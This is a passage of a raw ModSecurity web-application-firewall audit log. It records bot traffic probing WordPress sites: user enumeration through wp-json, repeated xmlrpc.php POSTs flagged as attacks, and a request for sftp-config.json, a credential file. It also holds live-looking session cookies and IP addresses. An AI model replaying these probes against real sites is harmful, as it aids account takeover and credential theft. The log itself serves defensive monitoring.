october_session=eyJpdiI6Imo2eGRrS1hjNVhRQ2Z3N1BLbVlLelE9PSIsInZhbHVlIjoicXdLRnF6cU5tV09hN0plODZUQU55WDhLK28yUnFrcTJzQ0RjOHE0WXlmcDg1M0tRaDkyTWdcL1Q3YVkyalVxcUJBMUZaVWJ5UExucnZlenkzOHN5dUZPN1BnaG4yMFlUcEtPSHd6dWRTMmFlZXl5VDY3Q3l0cjJNNGNON0xyM1p1IiwibWFjIjoiZDdiZjQyOGM4YmI3OTFhOTk5OTk3ODVjMzU3YWQ4ZDk3ODQ1MjgxZjlhNGEzODE1NmM1ZDhhMzE4NDQxMmYzMyJ9; tguest=guestc03880b85ecd12225e97e51753f04e4a65473dc7; tp_as=c5debd40bfcd4fd6d53c83289093cbfb; woodlife_flooring_production=eyJpdiI6Im10M3JzUXVOZDRKOFJibS81V0pER0E9PSIsInZhbHVlIjoiem8yOWVjT3BJR2FNa1ltdFZnc1h0V1pTRHlwR3lCUjJJeEdLN1VoaVVINWhHZnRJNTRTTTl3a0l2SG1VdXdYWUtrMXY2eFNWdTBaZFpJb0FBdWdrYTk1cG1CMFl2TWVZK3ptSWU2cStjbU1ROTVZVldlaVBNbDRtNksyKzZPRlgiLCJtYWMiOiI5OTFiYTZkMThkOTIwNTY3MzAwMjE1YmYyNzg3NTZiNDM3ZTE3N2E3MDZmMDk2YWIzNjVjOWM2NzRkZjkxMDI2IiwidGFnIjoiIn0%3D; disable_cache=eyJpdiI6ImN3WGpTNDdPQlhYMDAzV3liUSs5eHc9PSIsInZhbHVlIjoiWXU4aXFRUUJSb25lcVF5WnZCWHE4Rm1PZXZNNnFkV1NMNWFlamVJUDNrLzB3SnBTMDEydGtUc2FFQmNkZTBJdiIsIm1hYyI6IjMyMmE0YTkyZDdlYjQ3M2EyMWQ5YzliMGI3NDY3MmUyYzUxMWFhYTAxM2RmMDliMmI3NmU4OTVlYmFhOWViYmEiLCJ0YWciOiIifQ%3D%3D; deviceType=desktop; devicePixelRatio=1; __fp_fge=ac3d48aa454e1af5db7b837eb10e07878ec650259307afeada584cacfa5a011ad80fbb31447ae47bb68ad752439e44bae257500e8208f761b60d26f671a270e2894fa2e970845d8cd34effb182d50295585623a2f6fdce9675038da63e695293704092b1be914846cd382bfb15f275eff1be039c771ce54647f6ab3fc1387f7a6290d8ef96d58d238bdde13c4c5818ee02e6a575a6fe03fbadb4b7caea607e45db72b57fb44b6256016460eacbac15f099ec7a25bc1ba71cc02d74e52712b5408b2abb0f667fffb0b3bdfd4cde9b47984114b7be64efd15f121d84744cbcabb2b112a245475d51d5b9ef5da0fe47c408deb555cfd391e78cfe8c0c0405b1dcddf917cfcc932ee466c02860ab74aa7a5e1a7967b025ee1759be0643a0cb156b35.e2c093b507c2093ad62f91d10daee294ec0aabc5cbcb87900b129cb5c22dd8fb; TSf6cbd701027=083c9557bcab200044ea90fd1a58ebd3d2bc51839ccf1ac96406b261b5623abe57e979514f22bfb6081f4b65a21130009a0a732d0bf4e76cd19a1b4af1866a870b3c4d394d550eb148915cd2177afaa04685c3edc17b91fcad1917fb762349a6; __strk_cookie_eu_visitor=false; bid=JLoh31RNGiE; laravel_session=eyJpdiI6Ikpxb2xOMWpIUEJvZmRGUzlQMStOQXc9PSIsInZhbHVlIjoiMHdNeXkwTEJnUWNENHFRZllTUGtaSC9oUExPZFJDSXBDQzdHY1hyZHQyMGZvanRseVJ6aXRyS010M2hpZStEZXBOZEJza3VnbjAwMFZHaXNvOXpLdVVoNzZwSFdrZTNmdjN4Zy9POThLNldTUndxUjk0OVBxdFBGL2lZSVpxeVQiLCJtYWMiOiI2MTJkNTBmNmU1ZjMwZjI2NDFmOTQwYmIyYzliYjE1YWQ5NjM5OTlmNmM3YjA3OThmYWU0OGI0MTk2MzA2NDc3In0%3D; CMS_Session_ID=i3tmt2a6r6qpqcg3jvpokp462n; vip001_session=dfZKvJHrnXeHGf29C1u7M7QuymyEVjPIwiNZK22v; 222072f6e2f9fb720ebae90ca97df630=c69f7abd66322fa8d15210fbee8269b6; real_ipd=165.232.165.24; dsc_real_ip=165.232.165.24; ECS_ID=c709fdc1a05e4b8d416d626d15faa4a82b52a1fc; ECS[visit_times]=1; province=31; city=383; district=0; street=1; street_area=1; session_id_ip=165.232.165.24_c709fdc1a05e4b8d416d626d15faa4a8; ge_ua_p=RFiGgdBcSF00xaWcyz3h1uNseBs1Y2SnAhfa1Q%3D%3D; ch1c=b; __tad=1749986056.2734991; source_domain=360ua.news; loginsessid=Gk3kU56K1Ll6UmW6agW46kx5; visid_incap_2201820=cjv40cJ9SxWWLwi456o9p3+rTmgAAAAAQUIPAAAAAAAViDxREEiAfM/rPCGooI2P; incap_ses_674_2201820=ahP1AYBXIjBvW1qnwYdaCX+rTmgAAAAAJ/aRrYZz7VwNX4QYcCGEBA== User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en,en-us;q=0.7,en;q=0.3 Referer: https://cdn.alabamasymphony.org//wp-login.php --d4521d75-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.3econcepts.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --d4521d75-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.3econcepts.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE6tmVWckDejtnB0cwJW2QAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986713396653 824965 (- - -) Stopwatch2: 1749986713396653 824965; combined=18120, p1=741, p2=17016, p3=0, p4=0, p5=251, sr=156, sw=112, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache WebApp-Info: "default" "6bea1198-49c0-11f0-b2c7-320cf352c4f5" "-" Engine-Mode: "DETECTION_ONLY" --d4521d75-Z-- --27dacb78-A-- [15/Jun/2025:16:56:13.063754 +0530] aE6t1FirsA1ruSKrNWST6wAAAAQ 165.22.247.248 47714 127.0.0.1 7081 --27dacb78-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 499 Cookie: PHPSESSID=hv6ckaptpaj99rp7q4di5l6pae; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_5c919728b660f44cb73ed9aeb24122%7C%7C1750159571%7C%7C1750155971%7C%7Ccf8474f83e9c5af1401ac42651e5f97f; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=2433ac4d906ca515efa3ce55b90e5023%7C%7C1750159571%7C%7C1750155971%7C%7C61df68c7cdad5360732a9fe7ae308f9b User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --27dacb78-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=elsoit3k0ucu97l1iesifpkr4e; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_372b244fe8127839ff14319f5b977b%7C%7C1750159572%7C%7C1750155972%7C%7C022ee694e17be339b3745f09305b44ca; expires=Tue, 17 Jun 2025 11:26:12 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=cc07246c3c9728b72ed53e0681194536%7C%7C1750159573%7C%7C1750155973%7C%7C4e4df2c0950a9c9564eb2bc26fdb44ac; expires=Tue, 17 Jun 2025 11:26:13 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --27dacb78-E-- --27dacb78-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6t1FirsA1ruSKrNWST6wAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986772041515 1022326 (- - -) Stopwatch2: 1749986772041515 1022326; combined=2933, p1=427, p2=2102, p3=106, p4=50, p5=156, sr=101, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --27dacb78-Z-- --ef32a902-A-- [15/Jun/2025:16:57:13.553378 +0530] aE6uEFWckDejtnB0cwJXCgAAAAA 165.22.247.248 38946 127.0.0.1 7081 --ef32a902-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=tlkh92binsd09kijnbv0ikm81u; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_3d806a6c4ab619536ef8d1c79c434a%7C%7C1750159632%7C%7C1750156032%7C%7C6a81cd96bd64e068b652414dae818472; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=af22a9c009ce7707f48d172f6ca2eeda%7C%7C1750159632%7C%7C1750156032%7C%7Cd026fe98342385c968ed67c2fd539aa2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --ef32a902-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=elrj513k3vo1mfhvd8rnvcgr42; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_247a39576476c680f2140bc9a91348%7C%7C1750159633%7C%7C1750156033%7C%7C10ae90aa0b6a55e1ef4cb839a8c4e238; expires=Tue, 17 Jun 2025 11:27:13 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=1fb712de123214d8ad4e70ddae82771b%7C%7C1750159633%7C%7C1750156033%7C%7C73a5226e5320f44b33a9e8435959fff8; expires=Tue, 17 Jun 2025 11:27:13 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --ef32a902-E-- --ef32a902-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6uEFWckDejtnB0cwJXCgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986832541146 1012313 (- - -) Stopwatch2: 1749986832541146 1012313; combined=3019, p1=423, p2=2189, p3=104, p4=38, p5=164, sr=116, sw=101, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ef32a902-Z-- --028cbf3f-A-- [15/Jun/2025:16:58:13.194743 +0530] aE6uTDS8xKUOR1xBR5bo7gAAAAM 165.22.247.248 32798 127.0.0.1 7081 --028cbf3f-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 Cookie: PHPSESSID=alsn1mr2qsf553tf0plrfq1qau; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_84fa2b0bf34e4a7e49fce857868cd4%7C%7C1750159691%7C%7C1750156091%7C%7Cdb8b186589646b1800e874a189cc5a46; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=02ecff894574c2089c44aea07bdd0e1d%7C%7C1750159691%7C%7C1750156091%7C%7Cf7f9e285922ac4bdac968170fffc2004 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --028cbf3f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=6tb9fj6p6iboh4qisqkm80570p; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_1fc7f2af97adc1ccdc20c0e43bf6b1%7C%7C1750159692%7C%7C1750156092%7C%7C8366284ae799f34f9fee16f0873acbd0; expires=Tue, 17 Jun 2025 11:28:12 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=37fa683f91fceaf0f74e15637aca0d96%7C%7C1750159693%7C%7C1750156093%7C%7C2d78e0126ed1ace5b6f2886ac068f103; expires=Tue, 17 Jun 2025 11:28:13 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --028cbf3f-E-- --028cbf3f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6uTDS8xKUOR1xBR5bo7gAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986892169253 1025579 (- - -) Stopwatch2: 1749986892169253 1025579; combined=3102, p1=413, p2=2232, p3=114, p4=42, p5=185, sr=108, sw=116, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --028cbf3f-Z-- --4909b84b-A-- [15/Jun/2025:16:59:13.160116 +0530] aE6uiFu1-lKBbvo2E9pA4AAAAAw 165.22.247.248 42640 127.0.0.1 7081 --4909b84b-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 494 Cookie: PHPSESSID=a9llpe205j96r2fjleodq2sp9k; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_7e3c62e26e9bbb75cd16b06601ebde%7C%7C1750159751%7C%7C1750156151%7C%7C4e3ba65653504044015c4475ac0dc1be; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=ccb680585822e89214a0a6f6224ed8b7%7C%7C1750159751%7C%7C1750156151%7C%7C634b0c76fbda6df740da4cafb9444003 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --4909b84b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=sofd3ie3p1857hv056umfefbm1; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_16582e004ea967c6839a07e9d9cc2e%7C%7C1750159752%7C%7C1750156152%7C%7Cc9181ea6953aae26859e30d2ac445dae; expires=Tue, 17 Jun 2025 11:29:12 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=dee10b0da0f85a06ba4af5b07ec2efe6%7C%7C1750159753%7C%7C1750156153%7C%7C66f3be5315e0cb3d710a48c92cc0c57c; expires=Tue, 17 Jun 2025 11:29:13 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --4909b84b-E-- --4909b84b-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6uiFu1-lKBbvo2E9pA4AAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749986952148621 1011619 (- - -) Stopwatch2: 1749986952148621 1011619; combined=3185, p1=430, p2=2290, p3=114, p4=44, p5=196, sr=122, sw=111, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4909b84b-Z-- --04ec6932-A-- [15/Jun/2025:17:00:14.121690 +0530] aE6uxR_rKu9vEuWYHiZh-AAAAAk 165.22.247.248 52810 127.0.0.1 7081 --04ec6932-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 492 Cookie: PHPSESSID=bvaqev91p113c886o4226l4nig; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_b398a263c16792db1cfb1d7a0f557e%7C%7C1750159812%7C%7C1750156212%7C%7C4c79ebe216ad60d931b50e02370adb5b; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=d01690f5079abc00c8fffb7dcfbcf906%7C%7C1750159812%7C%7C1750156212%7C%7C89e92ee9656c31761d918e960be84d94 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --04ec6932-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=n6b0n4ia538jjp7o0ck4c4g4rq; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_e89e117e3275a00b6b0ab231a7cad2%7C%7C1750159813%7C%7C1750156213%7C%7C93efe9690d014ef647ec84c9ddef8561; expires=Tue, 17 Jun 2025 11:30:13 GMT; Max-Age=172799; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=6070d7f67eaec5185612a46a2e3edd01%7C%7C1750159814%7C%7C1750156214%7C%7C9a2d58efa1cc3cb59c047d68126097cd; expires=Tue, 17 Jun 2025 11:30:14 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --04ec6932-E-- --04ec6932-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (47+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6uxR_rKu9vEuWYHiZh-AAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987013084686 1037090 (- - -) Stopwatch2: 1749987013084686 1037090; combined=2832, p1=431, p2=2029, p3=99, p4=35, p5=148, sr=124, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --04ec6932-Z-- --47e3de3f-A-- [15/Jun/2025:17:01:14.537665 +0530] aE6vAWah4jZQMChzmsaA9QAAAAI 165.22.247.248 47970 127.0.0.1 7081 --47e3de3f-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 499 Cookie: PHPSESSID=4g3npn2ej46j33smplt4ipf2bt; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_c22649245c752084497f8b6ad6d98b%7C%7C1750159873%7C%7C1750156273%7C%7C03797a8b9a74089cef40d71be9573c5a; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=6229eb1d63eb4cbc7a9fc00c112fe485%7C%7C1750159873%7C%7C1750156273%7C%7Ce06297a9d599f5faf9e20d062bfb9aff User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --47e3de3f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=kpred4sk0uamm4c2s4gchohis5; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_c32b6e74f09a7e1c698cbc72bcdfc7%7C%7C1750159874%7C%7C1750156274%7C%7C9195676672565fbf90bcf16fc2b7ec73; expires=Tue, 17 Jun 2025 11:31:14 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=2cd496c22c5b3de5f39f0ee0a7364f75%7C%7C1750159874%7C%7C1750156274%7C%7Cecd1006164bc7adecc58f9ce79e6ba63; expires=Tue, 17 Jun 2025 11:31:14 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --47e3de3f-E-- --47e3de3f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6vAWah4jZQMChzmsaA9QAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987073461996 1075774 (- - -) Stopwatch2: 1749987073461996 1075774; combined=4180, p1=571, p2=3217, p3=104, p4=36, p5=157, sr=152, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --47e3de3f-Z-- --677d1812-A-- [15/Jun/2025:17:01:32.467775 +0530] aE6vExRnvL96XFagPFC4WgAAAAY 13.38.123.21 40272 127.0.0.1 7081 --677d1812-B-- GET /sftp-config.json HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 13.38.123.21 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --677d1812-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Content-Type: text/html; charset=UTF-8 --677d1812-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.dealsdray.com"] [uri "/sftp-config.json"] [unique_id 